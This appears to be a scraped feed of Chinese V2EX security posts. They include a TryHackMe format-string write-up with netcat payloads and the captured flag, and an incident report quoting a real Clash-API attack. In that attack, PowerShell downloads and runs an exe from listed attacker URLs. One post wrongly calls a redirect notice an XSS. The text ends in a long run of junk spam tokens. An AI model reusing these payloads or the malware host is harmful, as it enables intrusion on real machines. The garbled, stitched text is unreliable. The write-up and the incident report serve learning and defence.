目前我找到一本书:《日志管理与分析权威指南》,够吗?入侵检测除了分析日志还有别的什么吗?网络流量分析我总感觉不靠谱。之前我还看过《 WEB 应用安全权威指南》、《编程精粹》、《 Linux 系统安全》。目前我每天大概能拿出五六个小时的时间。大概可以給人肉入侵检测技术半个月的学习时间。之后的日常维护大概可以每天抽出 20 分钟的时间人肉和半人肉分析日志之类的。要是半个月学不到什么的话我就有点想直接放弃入侵检测了。也想直接放弃安装入侵检测软件了,反正效果也不好。

这个技能对练习的要求多不多?有没有什么免费的练习的环境?类似入侵的靶场之类的。入侵检测有没有类似的东西?

我总感觉入侵检测很重要。如果半个月学不到什么东西希望能得到一些吃不到葡萄说葡萄酸的能让我认为这东西不重要和能让我安心的借口。

我想做的网站是个类似豆瓣的网站,但是展示和推荐的主要是方法。我怀疑很多方法的效果都是因人而异的,我想做这个网站验证一下。另外这个网站也可以推荐一般的东西,就是可能会比较麻烦。

]]>
[THM 真题] 格式化字符串漏洞深度解析:从原理到实战利用 tag:www.v2ex.com,2025-08-23:/t/1154519 2025-08-23T23:38:07Z 2025-08-24T04:36:43Z xuemian member/xuemian Flag: THM{format_issues}

概述

格式化字符串漏洞是一种经典的内存安全漏洞,主要出现在使用 printf 族函数时开发者未正确处理用户输入的情况下。本文通过 TryHackMe 平台的实际案例,深入分析这种漏洞的攻击原理、内存机制以及实战利用技巧。

格式化字符串漏洞原理

漏洞成因

格式化字符串漏洞的根本原因在于 printf 族函数的设计机制:

参数数量不匹配:printf 函数无法在编译时验证格式化字符串与参数数量是否匹配。

栈内存访问:当格式化字符串中的格式说明符多于提供的参数时,函数会继续从栈中读取数据。

类型转换危险:攻击者可以通过特定的格式说明符强制函数以不同类型解释内存数据。

printf 函数的内部机制

当调用printf(format, arg1, arg2, ...)时,首先格式化字符串format被逐字符解析。遇到%时,根据后续的格式说明符从参数列表中取值。如果格式说明符数量超过参数数量,函数会从栈中的下一个位置继续读取。

漏洞代码分析

让我们深入分析这个 vulnerable 程序:

#include <stdio.h> #include <string.h> void print_banner(){ printf( " ______ _ __ __ _ _ \n" " | ____| | \\ \\ / / | | | \n" " | |__ | | __ _ __ \\ \\ / /_ _ _ _| | |_ \n" " | __| | |/ _` |/ _` \\ \\/ / _` | | | | | __|\n" " | | | | (_| | (_| |\\ / (_| | |_| | | |_ \n" " |_| |_|\\__,_|\\__, | \\/ \\__,_|\\__,_|_|\\__|\n" " __/ | \n" " |___/ \n" " \n" "Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!\n" "==================================================================\n\n" ); } void print_flag(char *username){ FILE *f = fopen("flag.txt","r"); char flag[200]; fgets(flag, 199, f); //printf("%s", flag); //The user needs to be mocked for thinking they could retrieve the flag printf("Hello, "); printf(username); // 🚨 漏洞点:直接将用户输入作为格式化字符串 printf(". Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...\n\n"); printf("Yours truly,\nByteReaper\n\n"); } void login(){ char username[100] = ""; printf("Username: "); gets(username); // 🚨 缓冲区溢出风险:不检查输入长度 // The flag isn't printed anymore. No need for authentication print_flag(username); } void main(){ setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // Start login process print_banner(); login(); return; } 

关键漏洞点分析

1. 格式化字符串漏洞 (第 37 行)

printf(username); // 危险!应该使用 printf("%s", username); 

问题分析

username变量直接作为格式化字符串传递给printf。攻击者可以在输入中包含格式说明符(如%x, %s, %p等)。这些格式说明符会导致printf从栈中读取额外的数据。

2. 缓冲区溢出风险 (第 46 行)

gets(username); // 危险函数,已被废弃 

问题分析

gets()函数不检查输入长度,可能导致缓冲区溢出。username数组只有 100 字节,超长输入会覆盖栈上的其他数据。

3. Flag 数据泄露机会 (第 30-32 行)

FILE *f = fopen("flag.txt","r"); char flag[200]; fgets(flag, 199, f); 

关键点

Flag 被读入局部变量flag[200]。虽然被注释掉不直接打印,但数据仍在栈内存中。可以通过格式化字符串漏洞间接访问这些数据。

内存布局与攻击机制

栈内存布局分析

print_flag函数被调用时,栈的布局大致如下:

栈顶 (低地址) ├─ FILE *f (fopen 返回值) ├─ char flag[200] (存储读取的 flag 内容) ├─ ...其他局部变量... ├─ 返回地址 ├─ 保存的 EBP ├─ char *username (传入的参数) └─ main 函数的栈帧 栈底 (高地址) 

格式化字符串的栈遍历机制

当执行printf(username)时,正常情况下如果username是纯文本,会直接输出。攻击情况下如果username包含格式说明符,printf 会尝试从栈中获取对应参数。

参数位置计算

在 x86/x64 架构中,第 1 个参数是格式化字符串本身 (username),第 2 个参数是栈上的下一个值,第 3 个参数是再下一个值,依此类推,第 N 个参数是栈上对应位置的值。

由于flag[200]数组在栈上,通过合适的偏移量可以访问到 flag 内容。

攻击向量分析

Payload 分析

成功的攻击 payload:

echo -ne '%5$s' | nc 10.10.20.224 1337 

详细解析

%5$s直接访问第 5 个参数位置。$语法允许直接指定参数位置,无需遍历前面的参数。s格式符将该位置的值作为字符串指针,打印指向的内容。

为什么是第 5 个参数?

通过试验不同的偏移量:

# 探测栈内容的命令示例 echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337 

经过测试发现,第 1-4 个参数是其他栈上的数据,第 5 个参数恰好指向 flag 字符串的地址,第 6 个及以后是其他内存内容。

内存对齐的影响

在实际环境中,flag 在栈中的确切位置可能因编译器优化级别、栈对齐方式、系统架构( 32 位/64 位)以及其他局部变量的分配而变化。

因此可能需要尝试不同的偏移量(%4$s, %5$s, %6$s等)来定位 flag 。

实战攻击演示

成功攻击的完整过程

$ echo -ne '%5$s' | nc 10.10.20.224 1337 ______ _ __ __ _ _ | ____| | \ \ / / | | | | |__ | | __ _ __ \ \ / /_ _ _ _| | |_ | __| | |/ _` |/ _` \ \/ / _` | | | | | __| | | | | (_| | (_| |\ / (_| | |_| | | |_ |_| |_|\__,_|\__, | \/ \__,_|\__,_|_|\__| __/ | |___/ Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it! ================================================================== Username: Hello, THM{format_issues} . Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD... Yours truly, ByteReaper 

攻击成功原理分析

输入 payload%5$s

printf 处理过程:程序执行到printf(username)username内容为%5$s,printf 解析格式说明符%5$s,访问栈上第 5 个位置的值作为字符串指针,第 5 个位置恰好指向 flag 字符串的内存地址。

输出结果:成功显示 flag 内容THM{format_issues}

其他探测 payload

用于探测栈结构的命令:

# 显示多个栈位置的十六进制值 echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337 

这个 payload 会显示前 8 个栈位置的十六进制值,最后用%s尝试将第 9 个位置作为字符串打印。

漏洞利用的关键要素

格式化字符串漏洞printf(username)直接使用用户输入作为格式字符串。

内存中的敏感数据:flag 被读入栈上的局部变量。

可预测的内存布局:在相同环境下栈布局相对固定。

直接位置访问%N$s语法允许直接访问特定栈位置。

防护机制与安全建议

代码层面的防护措施

1. 安全的 printf 使用方式

// 危险的写法 printf(user_input); // 安全的写法 printf("%s", user_input); 

2. 输入验证和长度检查

// 替换危险的 gets()函数 char username[100]; if (fgets(username, sizeof(username), stdin) != NULL) { // 移除可能的换行符 username[strcspn(username, "\n")] = '\0'; } 

3. 避免在栈上存储敏感数据

// 不安全:敏感数据在栈上 void print_flag(char *username) { char flag[200]; // 在栈上,可能被泄露 // ... } // 更安全:使用动态分配或其他保护机制 void print_flag(char *username) { char *flag = malloc(200); // 使用后立即清零并释放 memset(flag, 0, 200); free(flag); } 

编译器层面的防护

1. 编译器警告

# 启用格式化字符串相关警告 gcc -Wformat -Wformat-security -Wall source.c 

2. FORTIFY_SOURCE

# 启用运行时检查 gcc -D_FORTIFY_SOURCE=2 -O2 source.c 

系统层面的防护

1. 地址空间布局随机化 (ASLR)

随机化栈、堆、库的内存地址,使攻击者难以预测内存布局。

2. 栈保护 (Stack Canary)

# 启用栈保护 gcc -fstack-protector-all source.c 

3. 不可执行栈 (NX bit)

防止在栈上执行代码,减少代码注入攻击的风险。

现代防护技术

1. 控制流完整性 (CFI)

检测并阻止控制流劫持攻击。

2. 地址空间隔离

使用容器化或沙箱技术隔离应用。

3. 静态分析工具

使用工具如 Clang Static Analyzer 、Coverity 等,在开发阶段发现潜在漏洞。

安全开发建议

1. 安全编程原则

最小权限原则:程序只获取必要的权限。

输入验证:严格验证所有外部输入。

防御性编程:假设所有输入都是恶意的。

2. 代码审查

重点关注字符串处理函数,检查格式化字符串的使用,验证缓冲区边界检查。

3. 安全测试

模糊测试:使用工具如 AFL 、libFuzzer 。

静态分析:集成到 CI/CD 管道。

动态分析:使用 Valgrind 、AddressSanitizer 等。

原文:(微信公众平台)[https://mp.weixin.qq.com/s/12kNxP_-PI7Gr_c4Pnb_4A]

]]>
CROS 同源问题的一些疑问 tag:www.v2ex.com,2025-08-21:/t/1153943 2025-08-21T05:24:06Z 2025-08-27T07:04:31Z chinafengzhao member/chinafengzhao 最近在学习 CORS 同源策略问题,看到几个观点:

1 、跨域并不是请求发不出去,请求能发出去,服务端能收到请求并正常返回结果,只是响应结果被浏览器拦截了。 不仅仅是静态的资源。WebStorage 、Cookie 、IndexDB ,在浏览器层面上都是以域这一概念来划分管理的。 而且这个划分管理行为,就是在浏览器本地生效。和服务器、其他客户端没有直接关系。

2 、当响应的是附带身份凭证的请求时,服务端必须明确 Access-Control-Allow-Origin 的值,而不能使用通配符。

针对 1 ,比如说我做为可能有恶意脚本的黑客,不管你请求头带不带 origin ,我返回的 js 响应报文中,我始终带上 "Access-Control-Allow-Origin: *"这个响应头啊。 这样我的恶意 js 不就可以被浏览器解释并执行了?

针对 2 ,这个服务端必须是为什么要必须明确呢?如果不明确会怎么样呢? CORS 做为一个浏览器对资源请求的约束,它咋知道我的请求带不带身份呢?

请教各位大佬赐教一下

https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Guides/CORS

https://zhuanlan.zhihu.com/p/38972475

]]>
PVE 防火墙开启 IP Filter + MAC Filter 能有效防御 ARP 攻击吗?在 PVE 论坛找到的帖子说可以,但是 GPT 告诉我不可以,因为 ARP 攻击发生在第 2 层而软件防火墙工作在第三层 tag:www.v2ex.com,2025-08-20:/t/1153832 2025-08-20T21:57:37Z 2025-08-21T06:15:37Z drymonfidelia member/drymonfidelia Let's Encrypt 颁发的证书所包含的 CRL 链接完全被墙,可能导致所有用 LE 证书的网站在国内无法打开或者弹出警告。 tag:www.v2ex.com,2025-08-20:/t/1153589 2025-08-20T01:07:31Z 2025-08-24T18:29:27Z villivateur member/villivateur 今天用 curl 访问我的网站,发现报错:

$ curl -vv https://www.example.com/generate_204 08:43:01.876922 [0-0] * Host www.vvzero.com:443 was resolved. 08:43:01.880422 [0-0] * IPv6: 2408:1:1013:e900::1 08:43:01.883004 [0-0] * IPv4: 1.116.4.74 08:43:01.885021 [0-0] * [HTTPS-CONNECT] added 08:43:01.887128 [0-0] * [HTTPS-CONNECT] connect, init 08:43:01.889315 [0-0] * [HTTPS-CONNECT] connect, check h21 08:43:01.891506 [0-0] * Trying [2408:1:1013:e900::1]:443... 08:43:01.894156 [0-0] * [HTTPS-CONNECT] connect -> 0, dOne=0 08:43:01.896145 [0-0] * [HTTPS-CONNECT] adjust_pollset -> 1 socks 08:43:01.898445 [0-0] * [HTTPS-CONNECT] connect, check h21 08:43:01.901163 [0-0] * [HTTPS-CONNECT] connect -> 0, dOne=0 08:43:01.903526 [0-0] * [HTTPS-CONNECT] adjust_pollset -> 1 socks 08:43:01.907055 [0-0] * [HTTPS-CONNECT] connect, check h21 08:43:01.910135 [0-0] * schannel: disabled automatic use of client certificate 08:43:01.917094 [0-0] * [HTTPS-CONNECT] connect -> 0, dOne=0 08:43:01.919009 [0-0] * [HTTPS-CONNECT] adjust_pollset -> 1 socks 08:43:01.924728 [0-0] * [HTTPS-CONNECT] connect, check h21 08:43:01.933717 [0-0] * schannel: next InitializeSecurityContext failed: CRYPT_E_REVOCATION_OFFLINE (0x80092013) - The revocation function was unable to check revocation because the revocation server was offline. 08:43:01.939440 [0-0] * [HTTPS-CONNECT] connect, all failed 08:43:01.941833 [0-0] * [HTTPS-CONNECT] connect -> 35, dOne=0 08:43:01.944171 [0-0] * closing connection #0 08:43:01.947391 [0-0] * [HTTPS-CONNECT] close 08:43:01.949490 [0-0] * [SETUP] close 08:43:01.952020 [0-0] * [SETUP] destroy 08:43:01.954525 [0-0] * [HTTPS-CONNECT] destroy curl: (35) schannel: next InitializeSecurityContext failed: CRYPT_E_REVOCATION_OFFLINE (0x80092013) - The revocation function was unable to check revocation because the revocation server was offline. 

然后尝试访问证书里提供的 CRL 链接:

$ curl -v http://e5.c.lencr.org/80.crl * Host e5.c.lencr.org:80 was resolved. * IPv6: 2606:4700::6812:15d5, 2606:4700::6812:14d5 * IPv4: 104.18.20.213, 104.18.21.213 * Trying [2606:4700::6812:15d5]:80... * Connected to e5.c.lencr.org (2606:4700::6812:15d5) port 80 * using HTTP/1.x > GET /80.crl HTTP/1.1 > Host: e5.c.lencr.org > User-Agent: curl/8.10.1 > Accept: */* > * Request completely sent off * Recv failure: Connection was reset * closing connection #0 curl: (56) Recv failure: Connection was reset 

itdog 查询显示这个域名已经完全被墙,方法是 TCP RST 。

部分浏览器可能不会检查 CRL ,那就没问题。但可能更多的正规浏览器或者 APP 会检查,就会导致无法访问或者弹出警告。

小站站长可能会痛苦了,很多人可能没法上你的网站了。

]]>
我的网站开发安全计划,求大佬过目 tag:www.v2ex.com,2025-08-20:/t/1153581 2025-08-20T00:13:55Z 2025-08-21T13:05:24Z shendaowu member/shendaowu 希望获得的帮助

开发技术栈等

我看过的安全相关的书

在开发网站的过程中定期复习这三本书的笔记。书里的一些我感觉没什么大用,并且很麻烦的方法我没用,比如 chroot 。

安全工具和服务

静态代码分析工具:gosec 、vet 、golangci-lint 、snyk 。TS 的 lint 工具。

CF DDoS 防护、CF Tunnel 。

安全措施

应用开发注意事项。注入、XSS 、CSRF 之类的。太多了,懒得写了。嘴替:OWASP Top Ten 和 CWE top 25 。

写单元测试。

为各种服务提供最小的权限。

七天检查一次服务器和软件包更新。包括用 snyk 扫描一次代码,就算代码没更新,这个好像能发现用到的库的新发现的漏洞?

用 iptables 只开放必要的端口。基本只会开放 https 的端口的建立连接。数据包发出只允许系统和软件更新还有就是相关的入侵防御的规则的自动更新等。

网关 IP 地址绑定 MAC ,防止 ARP 攻击。使用 CF Tunnel 这步是不是多余了?

命令历史相关的环境变量设置为只读。命令历史附带执行时间。

删除无用的软件包和服务。

不使用隐藏的方式企图实现安全。比如改端口。

每月完整备份数据库。每天增量备份数据库。数据库中的密码 hash 和邮箱使用混合加密加密后备份到 OSS ,私钥保存在我电脑中的 KeePass 里。KeePass 数据库文件保存在 OneDrive 同步文件夹里。OneDrive 同步文件夹每月多处备份。不给 OSS API 分配修改和删除权限。对数据库的密码 hash 和邮箱添加数据库加密,就是数据库的数据文件泄露也无法读取的那种加密。我计划网站的上的所有数据都可以像维基那样打包下载。用户不想公开的数据保存在用户的浏览器或本地文件夹里。

入侵报警使用阿里云的云监控。

阿里云网页控制台使用自己生成的带密码的密钥对登录。私钥密码保存在 Keepass 里。

关键日志备份到阿里云的日志服务上。并设置好 API 的权限。主要是为了省钱,像书里那样用一个专门的服务器收集日志我感觉太贵了。

auditd 配置为锁定配置直到重启。

FireEye 辅助入侵检测和防御。我没在官网上找到怎么用。是个提供威胁情报数据的网站。

注意开发电脑的安全性。不安装来历不明的软件。来历不明的软件装到虚拟机里。不关闭杀软。操作系统有更新尽量马上更新。

数据库密码为 KeePass 生成的 20 位随机大小写字母与数字密码。特殊符号我嫌麻烦。

所有密码和密钥每季度换一次。

阿里云账号双因素认证。

发现被入侵后的操作

使用 chkrootkit 和 rkhunter 扫描 rootkit 。

unhide 反隐。

如果没有证据证明黑客没有修改文件,就重装系统并回档。我想不到什么证明文件没被动的证据,所以大概率应该都会重装和回档。

查看服务器是否有重启记录。防止 auditd 的配置被修改。

参考《 Linux 系统安全》中的附录 B 。附录 B 是关于被入侵后的排查。

奇技淫巧

除了特定用户,任何用户登录之前必须登录特定的用户,否则就立刻断网。

还有把某个黑客大概率会用到,但是系统正常运行不会用到的命令换成触发报警的脚本。不知道有没有这种命令?比如 ls ,黑客执行 ls 就断网。我想要 ls 的功能就用 myls 。

这两个是我想到的,如果没人说能用我就不用了。我感觉挺危险的。轻则误报,重则没法登录。

我为什么这么在乎安全问题?

首先我自认为我对安全的重视程度应该是超过平均水平了。

如果网站一直没什么流量的话,我也会一直维护这个网站。维护时间十年起步。长期运营的项目如果不在乎安全问题感觉迟早会出问题。另外我的网站虽然也能提供情绪价值,或者说用来娱乐,但是我希望主要是用它改善用户的生活。那些能用来改善用户生活的数据如果被篡改了很不好。虽然如果真被篡改了大部分可能会被发现,但是肯定会有漏掉的。

]]>
发现谷歌地图有 xss,请问该去哪提交给厂商? tag:www.v2ex.com,2025-08-19:/t/1153554 2025-08-19T15:07:02Z 2025-08-19T22:07:08Z wxf1259059284 member/wxf1259059284 算是偶然发现的吧,谷歌的地图有个 url 的跳转功能,在 url 后面追加?q=url 后可以重定向。

首先介绍一下什么是 xss 漏洞:

XSS 漏洞( Cross-Site Scripting ,跨站脚本攻击)是一类常见的 Web 安全漏洞。它的核心问题是:应用程序没有对用户输入的数据进行严格过滤或转义,就把这些数据输出到网页中,从而导致恶意脚本被执行。

攻击者通常通过在网页中插入恶意的 Javascript 代码来实现攻击,这些代码会在访问页面的用户浏览器中运行。

下面开始漏洞复现:

随便传递一个 url 参数,比如 https://www.huociyuan.com

完整的谷歌地图跳转链接就是: https://maps.google.com/url?q=https://www.huociyuan.com/

打开链接后发现页面显示以下内容:

重定向声明 您所在网页试图将您引至 https://www.huociyuan.com/

如果您不希望访问该页,您可以返回上一页。

问题的关键就在于其中的 url 是可以回显并且可点击的,这种很明显属于 xss 漏洞了。

结尾

想问一下谷歌的漏洞该提交给谁,他们有自己的应急响应中心吗?

]]>
注意各类 V2EX 插件的安全性 tag:www.v2ex.com,2025-08-19:/t/1153358 2025-08-19T01:48:49Z 2025-08-20T21:59:10Z xzl380 member/xzl380
  • 非邀请制之前金币无法变现,目前一个邀请二手市场价值 70~80 ;
  • $V2EX ,以及打赏机制;
  • 都可能导致插件作恶变得有利可图。

    ]]>
    v2ex 的 2FA 丢失了,怎么办?求各位大神支招 tag:www.v2ex.com,2025-08-11:/t/1151484 2025-08-11T02:34:34Z 2025-08-15T09:46:17Z yunhuduan member/yunhuduan 周末手贱非要试试鸿蒙系统,好了备份也好了。还原个鸟还原,哎!

    ]]>
    把 Clash RCE 武器化的典型案例 tag:www.v2ex.com,2025-08-10:/t/1151415 2025-08-10T15:35:03Z 2025-08-13T19:29:50Z huangxiao123 member/huangxiao123 国护已经完成,期间朋友分享了个很骚的网站,该站的蓝队人员把 Clash RCE 运用到了实战里

    RT ,访问该网站,会自动枚举 Clash 常见端口 + 4170x 端口,然后调用 Clash API 下发 yaml

    Link

    Javascript

    还做了系统版本判断,Victim 有 Win 有 Mac

    Yaml 文件

    let yaml_path = { "win": "http://60.29.77.223:8080/05260CAD5B9562AEA0AAC8039A3AD3987E8E5E42330C39421B5F2D8D9B7880A806755F53968F788FF311B9A772", "mac": "http://60.29.77.223:8080/385A4D8141A3E7951E5DCFF35A11387BA4B79B23970EF6954CD8F5CFF75B5E463662978C95EF1B2D2868232F60", } 

    这里以 windows 为例子,会执行 Powershell Invoke-RestMehod 方法下载 exe 存到C:\Users\Public\winIogon.exe 并且执行 winIogon.exe

    木马分析

    微步

    做了基础的一些沙箱检测,木马行为就单纯的执行 shellcode ,非注入

    更深入的分析 IDA 什么的,楼主就不会了 TAT

    ]]>
    只有 chromium 能不被阻拦的公司网络是怎么回事? tag:www.v2ex.com,2025-08-07:/t/1150694 2025-08-07T06:57:17Z 2025-08-12T20:29:49Z ldy2333 member/ldy2333 起因:从某刻开始,我所在公司的网络无法正常使用网易云音乐和 QQ 音乐的客户端。

    症状:网络检测正常,但 curl 和 firefox 访问 music.163.comy.qq.com 都会遇到连接重置,只有在部分 chromium 内核的浏览器中使用 https 协议并多次刷新才能访问。期间通过手机热点和全局代理明确是公司网络问题。阿里和腾讯的镜像站也会被屏蔽导致镜像源无法正常使用(同样可以用 chromium 正常打开)

    疑问:虽然知道大概是公司的网关设置了防火墙拦截,但是还是好奇为什么 chromium 内核的部分浏览器可以访问这些网站?防火墙能区分不同浏览器吗?如果能,是靠什么做到的?如果不能,chromium 为什么不受影响?

    ]]>
    如果手机丢了,里面的 Passkey 通行密钥怎么办? tag:www.v2ex.com,2025-07-29:/t/1148585 2025-07-29T11:02:08Z 2025-07-30T08:23:21Z moudy member/moudy
    到微信的文档里看了一下,完全没提将来换手机或手机丢了该怎么办。放在以前手机丢了,可以短信登陆。是不是开启 passkey 后手机丢了,就只能走严格的挂失流程了?感觉麻烦程度上升一个数量级。

    现在似乎主要网站都在推荐换到 passkey 登陆,但是并没有一个统一的流程来说明,如果 passkey 丢了该怎么办。有的是给一个巨长的恢复 key 让你记在什么地方,说实话此法巨扯淡,也就企业 IT 部门能有合格的 recovery key 管理,根本就不应该给普通消费者使用。有的怕是要走忘记密码的流程了。

    然后同品牌换手机一般还好说,可以还原密码本。跨品牌换手机似乎如何传递 passkey 就不知道了。原则上 passkey 一经创建就不应该离开设备。品牌不一样的话就没有传递 passkey 的统一标准了吧? ]]>
    华为账号一键登录的服务在哪可以取消? tag:www.v2ex.com,2025-07-26:/t/1147930 2025-07-26T16:59:14Z 2025-07-27T18:05:40Z minnow950501 member/minnow950501 是服务的取消,不是取消某个应用的授权。现在出现一个问题,如我的淘宝账号,我从华为手机换成了苹果手机,将手机给了孩子。即便我把淘宝退出,依然能通过华为账号一键登录。除非我退出华为账号,但是孩子不好申请华为账号。包括另一个问题,如一个没有解锁密码的华为手机掉了,即便我淘宝删除了登录设备,对方依然能通过华为账号登录。再掉手机时,不仅要第一时间冻结手机号,还得冻结华为账号,但是现在普通人依旧认为冻结手机号就行。

    ]]>
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86